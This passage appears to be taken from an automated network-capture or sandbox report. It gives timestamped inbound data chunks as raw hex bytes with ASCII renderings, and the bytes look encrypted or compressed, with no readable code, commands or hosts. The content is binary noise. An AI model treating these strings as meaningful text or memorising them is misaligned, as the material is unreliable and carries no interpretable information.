19 34 c5 e4 cf b9 a4 3f 22 07 c3 af 74 77 9d 6c 5b 55 b3 18 8c e4 b5 f6 5e b4 Data Ascii: I:HNh/P%Pg'$hvmg#7uth;MCrSx>zWv+0g(0[0^,`kJEy\M&; !Zc~:bw,336`t#%D_(-mRe3E;\9d\|/<wB(%x4\|~GP(}4?"twl[U^
2021-12-01 12:26:35 UTC	86	IN	Data Raw: 91 7a df cf c1 0c 83 da 01 dc 73 a9 4f 92 09 98 95 28 8e 22 57 76 23 82 69 13 cc a8 b5 c3 2b fe 27 37 56 64 db 53 62 55 b2 e0 a7 07 07 46 71 ef 59 09 11 db 41 5e 57 67 47 f1 9f a0 1d 1b 38 8e c8 f9 95 7b 0c 06 28 bc 38 48 c9 4e 41 10 a3 af b2 8b 7a 63 10 bf 80 6a 46 18 3b 50 86 57 99 1c 0b e4 03 49 ea 84 1a 55 f6 97 0f da b5 56 c7 5e fd da f1 07 29 9d 25 1c e5 fc bd 55 97 da 8d 55 08 14 4e 00 86 21 ee 21 44 68 e5 0c 53 0c fa 4b c8 4d 74 2f af ef 8c 8c 10 ad 11 3b c5 3a 35 90 e7 e1 0a 34 de 0a 75 ad 86 b7 d3 b1 2d b4 25 f9 fa 4d 4b 8f c3 78 e1 2c 31 c4 fb 89 47 2b 4d a6 52 99 f4 ea e0 a3 d1 92 aa 43 f4 ec d7 bf d7 6b 50 01 7b b7 7d eb 8b 87 91 f2 bd 66 60 5a c4 28 c0 a3 ea f9 e0 b4 e7 7e 37 33 53 d4 02 a3 d7 81 6d f8 54 5a 49 42 6b 82 a7 87 77 e7 96 15 f5 Data Ascii: zsO("Wv#i+'7VdSbUFqYA^WgG8{(8HNAzcjF;PWIUV^)%UUN!!DhSKMt/;:54u-%MKx,1G+MRCkP{}f`Z(~73SmTZIBkw
2021-12-01 12:26:35 UTC	87	IN	Data Raw: dd 61 5a 02 0c 7a 89 e8 c1 51 5d 52 0a 56 6d 23 be 5f 5d 32 06 b9 c2 10 e7 0a f4 6f d4 56 6b 39 76 0a f4 ab ea f3 a2 e8 66 cb 4a 7e 4c bb 20 da 17 6d 0b 0a 50 42 39 22 c5 1a 38 5e 41 c7 f1 57 65 b3 bb 2c a3 01 3d 86 f7 92 d8 2f aa cd a0 e7 37 1d ed 43 d9 20 13 04 c9 16 b7 5d ed df ac 9f f1 b4 b6 3c 8b 85 64 e7 93 f7 2e bf 5c 25 08 9f 31 e6 a5 71 c9 01 9b b2 4c fd 2a 34 3e d7 d8 4f ee ce a3 c3 35 60 c8 80 11 47 a5 17 a1 a1 c6 85 67 0c 56 66 48 57 d8 8f 9f eb b4 e5 2a 60 27 f7 91 95 2f fa 60 c0 fb 6a 21 b5 d5 56 93 69 ea 9a ea 1d 6a f9 57 0d 8c 08 d8 22 87 79 04 ba d0 6c 26 aa fa fa 07 ba b3 b7 58 1d e0 1e 76 fa 66 da 87 75 58 90 9f 4e 59 fd 65 33 50 70 23 c8 98 e7 48 92 ad b0 63 58 ee fe 16 d3 32 0b ce da 6d 62 48 bd 99 34 36 14 0d 57 1a 0b 93 48 e5 75 bc Data Ascii: aZzQ]RVm#_]2oVk9vfJ~L mPB9"8^AWe,=/7C ]<d.\%1qL4>O5`GgVfHW`'/`j!VijW"yl&XvfuXNYe3Pp#HcX2mbH46WHu
2021-12-01 12:26:35 UTC	88	IN	Data Raw: 97 3e 30 27 8e 32 11 43 f8 13 d2 a3 ca 16 59 d5 db fb 2f 6b e4 ed 16 cd b9 cc 6b 9f d3 90 da d5 08 67 03 86 21 bb b7 46 68 eb 05 21 12 f4 4b d9 40 10 dd 51 ee a4 a4 03 d0 0f b4 ef 3e 46 ac 9e 31 00 2c b0 68 47 87 c0 bf fb fe 2d cf e9 ef ba c1 b7 03 02 65 db 35 2f cc 99 b9 5a 11 b9 8f 3e ec f6 9b 38 a7 a2 d2 a0 52 fa 12 18 96 d7 61 7a 68 6c b6 77 f0 8c ed 5a 7d 94 62 66 2b 81 e7 c0 a9 ff 4b fc 9d e4 7e 37 b9 2b 79 02 a9 de 95 80 40 6b 58 4d 41 52 c4 73 08 57 ee 81 81 fd 0d dc 97 f9 c8 01 91 9c 7d b5 a4 67 38 f8 16 77 73 56 02 6d 7d c4 8f 64 83 85 64 74 ce 28 a0 c8 92 23 55 34 1f d1 75 d5 89 50 93 89 f0 0d 93 3c f0 02 b6 e8 bb da 1a c1 d7 26 25 f1 dd b5 6f ae 07 8c 03 95 47 fb cb d2 db 07 e4 aa bc 33 f0 1c f6 43 71 dd 36 5a ae 16 1d 2a 78 dc 9c 03 62 71 b3 Data Ascii: >0'2CY/kkg!Fh!K@Q>F1,hG-e5/Z>8RazhlwZ}bf+K~7+y@kXMARsW}g8wsVm}ddt(#U4uP<&%oG3Cq6Z*xbq
2021-12-01 12:26:35 UTC	90	IN	Data Raw: bd d2 af 9d 19 73 9f 85 56 2e b5 28 76 01 88 ab e2 ed 62 c0 1c 8d 7a 5d fd 2b 32 3b df f2 25 25 ce a9 65 1f 34 ce 61 ce 6f 68 17 2f 10 dc 0a 62 77 9d 67 5b 59 bd 04 89 c3 7b e3 51 ad 85 e6 9f 0f 8c 62 77 63 fb 6b 23 8b 6a 68 93 63 c3 d6 c2 ec 61 ee 8b ac a4 23 9d 22 ad 48 ca ba da 1c 71 2b fa e1 7b 60 b7 a0 8a bb e6 1c 7e d3 14 90 85 7f 45 32 33 64 59 e6 1a 82 9b 70 27 ce f5 23 60 c8 a9 a1 6d 4d ee e9 8a c3 3f 0e ce d0 cd 70 3f 94 4d 27 38 1b 63 35 2d 37 de bc 32 ca bc 71 76 ff 24 29 f1 61 aa c9 cd a1 ca 8a 14 db a0 be eb 27 b9 22 2d cf e7 32 1a fc 47 59 a5 c4 20 3d 1c 1f 63 93 23 db 54 ba e1 04 0d 46 55 a6 8f 93 02 98 c8 99 1d eb 79 3b fc 21 cc 2f 93 9b eb a2 c2 65 71 01 16 9a 30 51 86 8c 35 6e 64 f8 e2 d6 47 3d 67 a2 1d d5 03 c5 ba 67 92 23 9a 13 f0 ad Data Ascii: sV.(vbz]+2;%%e4aoh/bwg[Y{Qbwck#jhca#"Hq+{`~E23dYp'#`mM?p?M'8c5-72qv$)a'"-2GY =c#TFUy;!/eq0Q5ndG=gg#
2021-12-01 12:26:35 UTC	91	IN	Data Raw: e2 82 22 a4 d9 87 ae 7a d4 3a 58 9e c1 4b 4b 29 6c b6 6f ea a1 68 56 f2 bb 71 6f 09 fb 2b c0 a9 76 d7 93 8b e4 6d 30 3b 12 d7 02 a9 53 bc fb 8b 6a 4b 4e 59 48 ea 1a 85 7d e8 97 95 95 ce ce 84 ec d4 2c b9 da 7c b5 bd 71 51 2a 3e e1 76 51 77 40 76 d5 8e 5d 5a f2 5b 70 d8 34 9b 9c 82 37 4e 22 3b a2 30 d7 89 49 a8 db e1 25 0f 15 b1 06 a5 eb d9 fd 09 cc 5e 1c 2d e0 d7 df ae c1 2f 8a b4 fc 47 e9 ce ce 68 21 3e 1f d0 22 e3 09 e1 44 4b cf f1 d8 95 18 8c 3e 2d 1e 8d 06 71 b6 ad b3 5e 8f 4d 27 10 8b ca ed e3 b6 30 86 a9 5a b8 a7 b7 81 bd 08 b6 ea e0 12 9c c3 32 40 b3 94 ab ae 3b aa 34 2d 37 50 78 8e 0d b1 c0 3e 03 30 32 f4 d7 f3 32 c3 c9 1f 97 ad 7d 8b ab ed 75 7c 4b 24 23 6c 5a a7 c0 6f 25 5d ea 25 2e 5e fe a9 35 de 74 04 39 c8 e9 b2 3c 9c ec 74 37 12 4e a0 c6 83 Data Ascii: "z:XKK)lohVqo+vm0;SjKNYH},\|qQ*>vQw@v]Z[p47N";0I%^-/Gh!>"DK>-q^M'0Z2@;4-7Px>022}u\|K$#lZo%]%.^5t9<t7N
2021-12-01 12:26:35 UTC	92	IN	Data Raw: 04 e2 70 77 9f a0 74 e5 f7 1c 78 c3 38 56 fc 7f 4f 47 3a 7f 58 fd 6d 3d cd 72 23 c6 f4 e6 77 12 ba 66 e4 60 ff ed 11 f8 a6 0d ca cb 6a 70 3e 0d 2c 26 3f 1c 4f 4d 25 09 95 51 c9 24 ba 65 f3 35 2f 2e d9 71 0d 31 c9 a1 ce e0 c5 57 db ba fc 4c 4b 3b 57 08 ed 41 48 90 9f e9 b0 53 24 17 1a 35 70 b0 11 de 7e 01 e0 04 0b 86 55 b7 88 8e 3a 89 f0 32 0b 15 78 17 ef 33 d8 39 6a 8c 39 a9 ff 6f 71 dc 05 95 37 b8 94 aa 37 54 6c c4 ff d5 10 f5 7f b1 13 5b a5 e5 a7 99 80 3f 93 02 81 97 9a b7 fb 64 e6 19 f2 4d fb 2e 72 f5 b0 11 94 2e f2 2f 8a 5a 04 de c4 19 89 a6 8f dd 62 a5 20 52 0a b4 95 47 cb 31 51 e6 18 c5 76 00 cc 80 ef cb 34 e4 d2 2c 69 6d f0 00 72 5b 80 14 a6 3a 04 67 13 10 8a f0 0d ea 55 4b 44 7c 48 ff a4 41 17 c9 69 a0 bf 21 93 6a 0f 80 8e 8a 26 d8 ee 5d 4b 12 9a Data Ascii: pwtx8VOG:Xm=r#wf`jp>,&?OM%Q$e5/.q1WLK;WAHS$5p~U:2x39j9oq77Tl[?dM.r./Zb RG1Qv4,imr[:gUKD\|HAi!j&]K
2021-12-01 12:26:35 UTC	93	IN	Data Raw: 09 a6 23 d5 9b 5a a9 cc e0 0e b1 b8 b0 00 b0 db ad dd 0b cc 70 bf 24 f1 d9 dd a4 bf 01 8a cf 23 51 fa cf da 02 f0 b0 a8 c3 ee 6a 67 2d 4a 60 df 8f 4b 85 16 1b 2a 78 d0 9c 03 62 76 24 cd af 81 5a f5 6c ed d9 e3 f8 7d 49 45 90 60 cc 26 bd 92 b4 1a a2 f5 12 6a 4a 4e 1f 68 66 91 83 e2 11 05 3f 59 23 76 6e 86 19 94 e9 36 2b 7d ed d7 f8 ca 08 ac d1 14 84 ae 11 8f a8 ed 73 ea 70 f4 33 7f 5a 99 7e 69 ab ec db e9 2e 4f c5 9e 1e f7 6f dd 28 d6 7f 9d 94 ba fd 72 30 17 24 73 57 9c f5 b6 8d b3 fb 2c e5 48 95 d6 24 fa dd 5f b4 1b 60 92 03 61 50 2e 58 73 13 f1 da 60 98 91 2c 45 66 32 a4 47 9d 56 14 99 c3 7c 29 05 f4 7a f7 07 37 c1 66 2a e2 a8 39 cf 39 1d 8f b9 67 7e 4c a1 04 c9 03 34 af 0a 50 fe 11 be d4 18 49 89 4d d3 dd ea e3 22 a2 37 6e 42 3b 86 f6 84 cf 48 bc 6c a0 Data Ascii: #Zp$#Qjg-J`Kxbv$Zl}IE`&jJNhf?Y#vn6+}sp3Z~i.Oo(r0$sW,H$_`aP.Xs`,Ef2GV\|)z7f99g~L4PIM"7nB;Hl
2021-12-01 12:26:35 UTC	95	IN	Data Raw: a5 30 d5 11 8e e3 04 01 59 6f d8 72 99 29 89 db 92 1b 19 6d 2c 7c 39 c7 2f 92 9c 1b cc da 65 66 00 00 8c 24 c0 68 a0 37 4f 09 b9 03 d4 36 e5 6a b3 14 73 08 ed ba 61 9a 7c f2 11 85 a7 6f 81 fd 75 f6 65 cc 4f ea 2e 7c e8 59 c6 d7 2d e2 26 91 3d f4 cf c1 0c 97 a4 8e f5 5d ac 3c aa 64 f4 9d 56 c6 06 46 77 0d d0 65 7c f2 82 fe cb 44 98 2e 2d 4f 4d f0 64 7c 47 bb 6f a6 2b 08 53 f0 00 ad de 20 fa 52 57 38 1a 4a ee a4 78 0d 3c 6e 9d bd 5f a1 79 08 04 56 d4 ec c7 e8 68 50 1c 9c 6c a0 85 61 6f 7a 60 be 3c bd e1 b7 66 a9 67 82 06 26 4c 38 4b ec e1 5e 17 f4 9d 23 c2 a8 d1 be 75 d7 66 f9 2f 6f 89 a8 11 cd bd be 41 89 c7 b2 60 bf 7b 52 29 97 2b 93 f8 2b 05 e3 13 6b 39 e4 40 f1 66 68 16 57 81 cc af 12 dc ff 35 c0 2f 4d c1 37 e1 00 26 e5 77 4e e9 aa b4 ff d4 94 b5 2f ef Data Ascii: 0Yor)m,\|9/ef$h7O6jsa\|oueO.\|Y-&=]<dVFwe\|D.-OMd\|Go+S RW8Jx<n_yVhPlaoz`<fg&L8K^#uf/oA`{R)++k9@fhW5/M7&wN/
2021-12-01 12:26:35 UTC	96	IN	Data Raw: 59 36 60 7a 95 58 bc d1 36 2b 77 33 f4 df ca 28 ac d1 14 95 b1 6f 4e a9 ed 77 69 70 ae 36 7f 56 9d da 40 85 e8 fd f9 4e 6e ef a6 14 8d 61 15 1a cf 7c 84 ed 44 fd 72 17 1e 77 81 55 9c f7 4b 6d a5 21 31 45 59 99 b8 f0 c2 12 5b b6 1f 1f 09 df 61 54 00 49 78 9a d2 d4 62 a6 4d 2c 45 62 23 af 50 49 cf 03 bd 73 06 f4 03 f1 56 54 48 26 cd 5b 2d de ae ed cb 3f 68 bf 36 60 74 36 ae 14 f5 98 1d 0c 00 7c ff 11 0c d6 18 45 eb 67 c5 f5 5e 9b 20 b3 5c 02 45 3b 82 f5 95 d5 58 bc b7 a0 ed 28 0a 7c 7c db 24 33 2c 89 14 a4 67 c1 9e 64 9f fb ac d9 b8 8a 85 60 bc ba f5 2e bf 20 71 77 73 3b ce e2 71 df 76 fa 52 4c f9 29 3b 55 3f da 34 21 cc a7 ba ff 25 ca ff d8 67 a5 53 2e 16 46 ac 65 77 9c 1b af 53 ac 0a 9d 98 c6 e5 51 a1 5a 14 95 1b 9c 74 24 23 fb 6b 2d 9f 89 18 92 63 c8 c2 Data Ascii: Y6`zX6+w3(oNwip6V@Nna\|DrwUKm!1EY[aTIxbM,Eb#PIsVTH&[-?h6`t6\|Eg^ \E;X(\|\|$3,gd`. qws;qvRL);U?4!%gS.FewSQZt$#k-c
2021-12-01 12:26:35 UTC	97	IN	Data Raw: df 25 57 6d 0e d9 95 12 ea 8b fc c2 58 40 2d 2d 43 61 c2 51 68 4a 82 1b b1 d5 0f 52 ee 09 b5 f3 0e e8 57 48 a9 77 64 e5 ad 5c 6f 83 69 8c b5 3b 8f 68 0d 0e 28 bd f3 39 e3 62 48 1a e4 c7 b1 8b 7a 7f 78 7c 80 7b 47 01 41 90 85 7b 99 04 61 ea 3e 4b e0 91 38 06 f1 97 14 d6 bf 3e b5 4d e9 dc de d1 6e 29 24 16 cb ce c4 57 9d d9 e9 bf bd 7b 52 0d 9b 38 96 f2 55 6d fa ed 60 33 ff 4c df 3f 80 16 51 ea bc be 17 d6 c8 3e d3 c0 47 82 e6 f6 13 29 b4 68 4f b0 8c 43 fa d8 2d 9f 2a d7 95 3a 4f 8f 16 79 d9 24 0e c6 ea bd 58 11 b3 6a 7e ee e7 85 22 b7 db 95 a4 26 67 3a 58 95 c4 6f 40 2d 46 fb 7c e1 83 ed 53 f8 91 65 60 5d 6d 2a c0 a8 d1 ff bb f5 e7 7e 37 0d 89 dd dc a7 fb bf cc 8b 6b 52 44 60 7b c2 a5 8d a3 ee 86 a9 86 dc cc 97 fd d9 0c 99 db 77 9e ae 6b d6 3e 16 76 9d 53 Data Ascii: %WmX@--CaQhJRWHwd\oi;h(9bHzx\|{GA{a>K8>Mn)$W{R8Um`3L?Q>G)hOC-:Oy$Xj~"&g:Xo@-F\|Se`]m~7kRD`{wk>vS
2021-12-01 12:26:35 UTC	98	IN	Data Raw: 3c 36 3c 77 a0 5c d4 7f ba e5 19 07 46 5d ac 67 99 05 87 e3 fe 16 19 78 1f e1 30 39 2e b8 87 12 a7 93 74 67 0a 12 82 22 a3 87 a8 2e bb 67 ff 0b d7 14 79 66 a2 13 77 7f f5 b6 67 89 09 67 12 a9 a0 44 c9 68 64 f8 00 85 42 eb 24 69 ff 42 10 b0 3b 1d 27 b7 58 99 d5 bc 14 9a b5 81 c2 7a a3 3c a4 13 66 9e 7a c4 53 ec 7d 0b c7 60 0a ca 80 f6 dc d5 f5 00 24 42 69 a6 4c 6c 4a 97 00 aa 2b 06 69 13 10 8a f4 16 f5 52 59 41 88 49 c2 ac 49 10 37 60 93 b9 ce 94 57 0a 25 3c 80 b3 38 1d b1 46 38 98 8a b0 8b d1 61 6b 79 51 6a 42 0f 5e 7d 80 6f 01 0d 0e 97 3c 5a ee 95 cc 14 d8 92 1c d9 bf d3 b0 61 ee de e6 d1 68 b3 29 1e ce ab 97 96 9c d3 9c ce a1 68 5c 01 97 2f 8a 0c 45 44 e4 04 6b 05 e6 4f d9 53 6f 08 af ef 8c a6 1b d4 a4 36 c4 3e 42 b1 ec f2 04 2c a5 7d 50 51 87 91 fe df Data Ascii: <6<w\F]gx09.tg".gyfwggDhdB$iB;'Xz<fzS}`$BiLlJ+iRYAII7`W%<8F8akyQjB^}o<Zah)h\/EDkOSo6>B,}PQ
2021-12-01 12:26:35 UTC	99	IN	Data Raw: f5 3c b0 c0 58 09 55 6e 9e 05 af d4 36 3a 72 2f 0a dc ce 22 ae aa 10 96 a7 16 ad d2 fd 72 6a 5c 37 35 04 4c b0 d1 6c 25 5d 92 56 3d 48 e7 bb 0d f2 65 12 2d d8 69 5a 13 97 ed 70 21 7b da a9 39 19 9e eb 3b a4 27 24 2d 48 9f c5 3e c7 0d 54 4a 1a 4e fc d8 63 2b 24 48 78 8d 8d 51 60 e3 47 25 9f da f4 a4 4f 47 df 02 95 d0 02 ec fb f5 52 d7 4b 5d d5 76 26 f2 97 c1 99 20 08 9c 34 71 7b 52 5e 11 f1 11 37 10 15 59 e7 3c 22 c5 1d 5c 88 bf c6 d9 52 ca 14 bb 30 f0 40 3b 97 f2 8f d6 a2 95 e3 ac e5 3f 73 a0 d6 25 df e6 33 87 07 b2 57 d4 9b b1 89 05 ad f5 b3 88 91 1f 9a ac f5 2a aa 35 74 0f 9f 2a cb f9 61 37 0a 3b 5e 4e 86 25 39 28 de f6 2b 3a dd b0 c2 19 34 cf ed 24 46 89 10 38 05 ce 87 74 72 82 71 b6 52 80 0c b4 ee 8d 08 ac 54 d8 dd 95 1b 8b 46 5a c0 fe 69 29 9d 3e 57 Data Ascii: <XUn6:r/"rj\75Ll%]V=He-iZp!{9;'$-H>TJNc+$HxQ`G%OGRK]v& 4q{R^7Y<"\R0@;?s%3W5ta7;^N%9(+:4$F8trqRTFZi)>W
2021-12-01 12:26:35 UTC	100	IN	Data Raw: 02 f7 35 56 cc 2a 40 56 0b da 5b 10 c6 af fe c1 2b 2f 2c 2d 54 18 57 42 6d 40 9f 1c a5 23 61 b5 ec 11 a0 da 02 fd 5a 3e 22 76 48 e4 ff 49 17 e9 79 88 a7 61 83 70 d6 04 31 94 e8 cf 8d 19 41 12 81 66 b4 a1 70 60 7b 79 80 68 42 18 48 73 a7 57 99 0d 0e 97 3c 50 da 8b 32 12 f5 97 05 0f a3 c0 a5 63 af a1 f5 2e 69 9b 50 2a cd bd be 78 96 fb b4 c1 bf 7d 2b 82 84 2b 99 88 46 38 8e da 60 1f f3 41 f1 d1 69 16 5b e3 88 3e 10 d6 d3 37 cc 40 d5 ae e5 eb 28 ec b5 79 4c bc 82 bb 94 60 2d b4 25 fc bc ee 8d 62 3a 4f 4e 3d 3e ce f9 83 5b 00 b6 c8 e8 ec f6 9b 04 89 d3 c6 b3 57 f8 55 92 95 d7 6d 7e 37 7f b2 6c e4 f2 e5 56 f2 b9 6a 77 2c 81 30 c1 a9 ff ed 96 f0 c1 7f 3d 1f 7c 12 03 a9 d8 b1 e9 8d 43 cf 4b 48 49 ef 1f 59 73 fc 87 7d 90 fa dc 97 e6 b6 5b b9 db 76 69 ac 35 2c f6 Data Ascii: 5V@V[+/,-TWBm@#aZ>"vHIyap1Afp`{yhBHsW<P2c.iPx}++F8`Ai[>7@(yL`-%b:ON=>[WUm~7lVjw,0=\|CKHIYs}[vi5,
2021-12-01 12:26:35 UTC	102	IN	Data Raw: d5 4c 06 50 4b c6 18 88 d2 01 f4 14 f2 61 cc b7 27 eb 60 24 8d 8e ee cb 3d 0d b1 ad 62 7e 46 b6 08 b2 be 1c 0c 00 4f ec 2a 24 d4 09 45 87 5b 39 f4 78 fa 20 df 2f e2 45 3f a6 f7 11 db 5c bc 56 a2 ed 24 61 86 13 72 20 19 26 96 0f a4 51 c5 8f a8 88 05 ad f5 bb 92 96 64 94 bc f3 31 ba dc 66 26 83 39 b5 e8 72 c9 0f 14 29 55 fc 2b 3c 00 43 d8 34 2f d8 bb a8 b0 25 ca f1 c5 57 b6 15 2f 07 cd 98 6c 89 9c 4a 00 51 d7 00 9e eb b1 f9 dc 80 27 f7 94 08 9d 67 5a d6 e4 3b b5 8c e3 40 8c 28 5e d1 ef 05 77 72 90 85 bf 10 44 31 aa 29 19 ad 46 09 00 b1 e5 ea e6 60 b6 ab 43 22 6f 0d 7b cf 2a 46 96 7a 59 58 7d cd 59 fd 6d 51 91 63 25 cc 9f e9 7f d3 53 b1 45 69 fd 96 1e ea a3 0a cc d9 14 7c 3a 83 9f 5b ee 0b 67 22 0d 93 91 42 c7 23 a4 1c a4 36 24 23 ea 7a 36 e4 cd b0 ce ee cb Data Ascii: LPKa'`$=b~FO$E[9x /E?\V$ar &Qd1f&9r)U+<C4/%W/lJQ'gZ;@(^wrD1)F`C"o{FzYX}YmQc%SEi\|:[g"B#6$#z6
2021-12-01 12:26:35 UTC	103	IN	Data Raw: 65 ff cb ff 30 7b 61 24 3a c2 bf c4 5f 9c d3 9e fa df 84 a7 fe 99 38 80 f6 44 79 e5 0c 76 e1 f4 67 e2 40 10 18 50 ee a4 b3 9f fd d9 3b c4 33 4f b8 fa b1 9c 25 a3 66 01 33 8f a5 e0 68 26 ad 33 73 b3 df a6 ec 35 7c cd a3 37 d8 fc 1a 51 0c a5 3b 77 f8 e8 fe 80 a3 d1 9c bd 4a e3 3e 58 85 d3 74 42 d7 6f 9a 6a e3 f2 f2 56 f2 b9 64 4e b2 f8 2a ca bf e5 93 3a 8b e5 74 22 0a 00 d2 02 b8 da 8e 05 8a 47 57 4b 33 4d c3 a5 83 7b 81 1d 81 86 d7 c6 84 f9 d9 1d bd c4 70 4b af 49 54 3c 6d 79 76 51 75 50 57 5f 87 75 81 e0 45 19 67 22 88 82 8f 2e 4c 21 1b b3 35 c9 77 5b 97 de f0 76 97 15 b1 04 a0 ca 30 dd 0b c6 4e 15 4a 58 df ce a8 b1 0e 9b b0 fa 40 fe dc 26 78 00 b3 b0 d4 fc f0 0d f6 55 7a 25 e1 f9 90 14 66 26 02 0c 98 04 70 67 30 01 20 28 5a f1 09 9a c0 f0 f6 a3 10 64 a5 Data Ascii: e0{a$:_8Dyvg@P;3O%f3h&3s5\|7Q;wJ>XtBojVdN*:t"GWK3M{pKIT<myvQuPW_uEg".L!5w[v0NJX@&xUz%f&pg0 (Zd
2021-12-01 12:26:35 UTC	104	IN	Data Raw: 97 20 30 e7 5f c2 0f 78 d4 4e fd 21 2b 2c c6 c9 3c 25 df ab de e7 24 e6 fd cc 54 a0 09 3c 1e cb 96 6d 68 8b 98 49 7f bd 0d cf 90 ac e6 51 af 39 b7 0d e6 67 89 40 d7 e8 63 29 8c ee 48 81 9d c3 ec e0 0c 66 f9 56 93 a0 17 cb 33 a7 33 17 b2 c5 0f fb ab d6 eb 72 1e 19 b7 5c 3c ec 04 6d da 3c cb 8f 60 6c b8 13 48 55 ff 64 4a f4 a4 22 cc 88 f0 44 db a5 b0 78 43 e1 13 11 c7 aa 36 f0 25 90 9e 24 8a 88 3c 3c 1b 6f 33 db 08 bf 41 d5 26 b6 73 1c 3e 3b 26 0b 67 09 ef db a6 df 2b 79 c8 a7 a9 fa 52 73 33 5e 08 f6 3a 01 87 61 e2 e6 48 29 52 ed 35 70 a9 3e cd 6d b2 e1 15 03 59 4f 49 98 b4 33 80 98 9c 71 1b 79 17 fa 56 41 2d 94 87 1c 79 56 09 1b 16 17 9d 2c b0 9c b3 3f 45 77 db 17 2a 3d da 64 b5 0a 53 b4 fe b2 78 a5 ed 98 3f 87 86 46 8f 41 98 07 f5 d2 4d f9 14 6e e4 32 10 Data Ascii: 0_xN!+,<%$T<mhIQ9g@c)HfV33r\<m<`lHUdJ"DxC6%$<<o3A&s>;&g+yRs3^:aH)R5p>mYOI3qyVA-yV,?Ew*=dSx?FAMn2
2021-12-01 12:26:35 UTC	106	IN	Data Raw: 52 38 66 a9 66 1f 88 d0 5e fa ac 65 57 84 e5 36 d3 a1 fb ed 9b 94 f0 80 3c 37 1f c7 04 be 9e 8e fa 8b 6b 47 5f 5b 4b c2 b4 8f 62 f9 7f 82 aa c4 d9 94 f5 c6 00 6f f3 40 b4 ae 6f 6b 96 14 77 7d 2c 50 52 7f c0 9a 6d 98 fe 5b 67 c6 35 76 89 bc 20 47 36 13 a2 20 df 91 a4 ba e5 fe 0e 17 a3 ab 3f 14 e3 aa df 12 df 50 0f 34 f9 c0 c1 5c af 2b 9c b1 f9 59 e5 df 0e 51 10 b1 a8 cd 85 ec 1d f2 4e 7f cb f3 dd 84 07 15 31 fd 0d b0 0d 62 63 30 01 55 5b 4d 2b 10 82 d7 f9 e1 ab 01 71 b0 48 c7 d8 b6 ad b5 10 ac e5 0d 6d 55 42 0a 48 b3 84 8b fe c7 ab 12 51 1d 1f 87 6a e1 a7 c2 3e 2b 66 3b e9 23 e3 13 ab d6 09 a4 ef 0c bc a1 ed 62 62 47 39 c9 7e 70 a8 d4 6b a3 f5 e9 29 15 74 ec a6 14 df cd 01 28 cd 05 87 13 bb f9 6d 3f 06 57 af 46 94 ee 34 c4 a5 0d 2a 3a 20 81 c4 2f c6 07 31 Data Ascii: R8ff^eW6<7kG_[Kbo@okw},PRm[g5v G6 ?P4\+YQN1bc0U[M+qHmUBHQj>+f;#bbG9~pk)t(m?WF4*: /1
2021-12-01 12:26:35 UTC	107	IN	Data Raw: 8d 72 5e 43 03 62 d5 05 67 4e 9a 58 10 cd 8e e5 62 b3 a3 b1 69 4f 90 70 12 eb a9 82 5f da 6f 60 2d ab 07 35 3c 00 4b 20 33 03 4d 31 cf 24 b6 0e 1c 37 24 2d f7 77 21 f5 a7 7b 7f e6 17 56 8b ba fc 4c 1e 30 57 08 e3 30 65 9c 9e e3 ce 4b 37 52 8a 37 70 a9 07 d9 05 b4 e0 04 0f 44 2e a7 98 98 2d 95 d9 9a bd 7a 23 17 fe 33 e1 2d ef 83 14 a3 ea 6e 70 65 86 9f 28 a5 a1 b7 3d 9b 44 d1 7a da 3d f6 63 cd 9f 59 b4 e5 ac 0d bc 7b 67 ec 7a 73 4f 9f cc 64 f8 00 d0 75 ea 24 67 3a 4e 06 92 23 c9 67 87 52 9e cd c1 06 9b a7 85 dd 73 19 3d ac 0b 50 9e 56 cc 2c 57 7c 0b db 6b 13 c7 93 ce c3 2b dc 2c 2d 45 63 db 42 7c 5c 98 35 bd 2b 09 69 13 10 8a f4 16 f2 52 56 41 88 49 c2 ac 49 17 37 6f 94 4d 31 b9 79 23 0c 12 5b ec bc f8 4f 41 16 a1 c0 b1 a3 67 61 6b 73 82 75 58 36 f3 6e 84 Data Ascii: r^CbgNXbiOp_o`-5<K 3M1$7$-w!{VL0W0eK7R7pD.-z#3-npe(=Dz=cY{gzsOdu$g:N#gRs=PV,W\|k+,-EcB\|\5+iRVAII7oM1y#[OAgaksuX6n
2021-12-01 12:26:35 UTC	108	IN	Data Raw: b1 f6 82 33 0f cc 5e 19 a8 f6 df ce a3 ba 13 9c a3 d2 f6 fa cb d2 5f 07 ea af d3 d0 1d 18 f2 4c 76 56 e7 d5 84 17 09 3c 17 24 3f 03 66 6a aa 9e a1 85 5a f7 15 08 dc e3 f2 a2 15 74 ac 7f 6f 26 b7 8b 94 08 b3 fd 30 09 42 5a 31 af b7 95 85 f3 b4 ad 3e 59 24 43 7c 84 1a aa f9 c6 2f 77 35 56 cc e6 2b b8 c5 36 34 a7 12 a5 81 58 73 6a 52 0d 35 54 64 b6 c5 40 46 ee fd f9 2b c5 ea a6 1e f6 71 17 3c ef db a4 12 b1 e9 5a d7 11 5f a9 41 11 f6 38 3a a5 35 2f 2b 73 39 c5 2f c8 3a eb b4 1b 68 c1 6a 61 50 20 73 16 76 1d 28 65 f7 65 de 41 62 25 b9 dd 4c cc 07 94 d5 13 e0 2d 57 7e db 43 0e 9d 77 26 fc 8a 31 db 1c 33 ae 34 60 74 41 b6 1a f5 2f 1c 0c 00 8e f4 3f 08 d4 18 43 d9 5d c7 f5 54 e1 22 a4 21 e3 45 3b 75 f6 90 db af 95 cf a0 fd 2e 77 9e 66 db 20 18 37 b9 11 b7 d3 c4 Data Ascii: 3^_LvV<$?fjZto&0BZ1>Y$C\|/w5V+64XsjR5Td@F+q<Z_A8:5/+s9/:hjaP sv(eeAb%L-W~Cw&134`tA/?C]T"!E;u.wf 7
2021-12-01 12:26:35 UTC	109	IN	Data Raw: 5d e2 8f 1b 7a bf 17 fe 33 fd 56 6b 72 ea 7d f8 76 77 7f 2d 9d 28 ae ab ac 26 54 13 e8 01 d4 3d 99 30 a2 19 51 68 c7 4f 63 81 15 b3 14 af ad 43 b7 ba 00 f8 0a fa 4d ea 24 40 e4 4e 10 b3 25 e3 26 a3 52 9e cd cd 06 9b b5 85 dd 73 af 3e ac 0b 98 db 56 cc 20 7d 7d 0b c1 05 12 c6 80 e8 c1 2b f4 2c 2d 45 6b d9 42 6d 4a 18 1f a6 2b 16 7e ed 11 05 f7 0e f9 5e 51 57 76 48 ee ae 5e 1e 37 68 8c 0a 31 95 7b 92 0e 39 b8 bd c5 e2 4e 57 12 8b ba b3 8b 70 61 70 49 89 6a b7 1c 48 6e 68 57 93 1c 10 1a 17 4b ea 8f 21 1c 87 2f 05 d3 a9 d3 b2 70 f9 ce d3 ab 6b 9f 23 01 40 ba bf 55 9c c0 94 d2 b1 6d 49 08 